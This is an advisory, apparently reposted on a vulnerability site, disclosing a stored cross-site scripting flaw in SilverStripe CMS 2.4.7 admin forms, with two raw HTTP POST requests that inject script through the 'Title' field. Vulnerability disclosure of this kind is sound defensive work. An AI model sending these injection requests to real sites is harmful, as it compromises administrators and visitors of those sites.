SilverStripe CMS 2.4.7 <= Persistent Cross Site Scripting Vulnerability

2012.10.29
Credit: Aung Khant
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

1. OVERVIEW SilverStripe 2.4.7 and lower versions are vulnerable to Persistent Cross Site Scripting. 2. BACKGROUND SilverStripe CMS is easy for both developers and content authors to work with. The SilverStripe Framework keeps the code tucked away neatly so that it can be accessed easily by programmers but does not get in the way of content authors. 3. VULNERABILITY DESCRIPTION The "Title" parameter was not properly sanitized upon submission to "/index.php/admin/security/EditForm/field/Roles/AddForm" and "/index.php/admin/RootForm" urls, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Tested on 2.4.7 5. PROOF-OF-CONCEPT/EXPLOIT //////////////////////////////////////// POST /index.php/admin/security/EditForm/field/Roles/AddForm?SecurityID=[ID] HTTP/1.1 Host: localhost Referer: http://localhost/index.php/admin/security/EditForm/field/Roles/add?SecurityID=[ID] Cookie: PHPSESSID=1e4ea938f83b04bc826231987cedc050; Content-Type: application/x-www-form-urlencoded Content-Length: 146 Title=%27%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&ctf%5BClassName%5D=PermissionRole&SecurityID=[ID]&action_saveComplexTableField=Save POST /index.php/admin/RootForm HTTP/1.1 Host: localhost Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.4.0_rc3 Content-Type: application/x-www-form-urlencoded; charset=utf-8 Referer: http://localhost/index.php/admin/ Content-Length: 256 Cookie: PHPSESSID=25c8f4060c398d05732fe494eb3ad4f1; Pragma: no-cache Cache-Control: no-cache Title='%22%3E%3Cscript%3Ealert(%2Fxss1%2F)%3C%2Fscript%3E&Tagline=test&CanViewType=Anyone&ViewerGroups=&CanEditType=LoggedInUsers&EditorGroups=&CanCreateTopLevelType=LoggedInUsers&CreateTopLevelGroups=&SecurityID=[ID]&Theme=&ajax=0&action_save_siteconfig=1 //////////////////////////////////////// 6. SOLUTION Upgrade to the latest 3.x version. 7. VENDOR SilverStripe Development Team http://www.silverstripe.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-06: notified vendor 2012-10-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_xss #yehg [2012-10-15]

References:

http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_xss
http://www.silverstripe.org/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top